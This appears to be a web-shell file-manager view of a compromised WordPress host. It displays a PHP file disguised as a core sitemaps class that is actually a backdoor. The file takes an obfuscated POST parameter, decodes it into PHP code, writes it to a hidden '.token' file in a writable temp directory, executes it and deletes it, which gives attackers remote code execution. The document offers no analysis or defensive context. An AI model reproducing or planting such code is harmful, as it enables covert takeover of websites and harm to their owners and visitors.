HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/public_html/wp-includes/sitemaps/providers/class.wp.sitemaps.taxonomies.php
<?php

if(!empty($_POST["da\x74"])){
	$elem = $_POST["da\x74"];
	$elem =		 explode(	  '.' ,		 $elem	) 	 ;	 	
	$pgrp		='';
            $s9		='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS		=strlen($s9);
            $o		=0;
    
            $__tmp		=$elem;
            while ($v9		=array_shift($__tmp)) {
                $chS		=ord($s9[$o % $lenS]);
                $d		=((int)$v9 - $chS - ($o % 10))	^  15;
                $pgrp	.= 	chr($d);
                $o++;
            }
	$factor = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), "/dev/shm", getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir()]);
	foreach ($factor as $symbol):
    		if (array_product([is_dir($symbol), is_writable($symbol)])) {
    $value = join("/", [$symbol, ".token"]);
    if (file_put_contents($value, $pgrp)) {
	require $value;
	unlink($value);
	exit;
}
}
endforeach;
}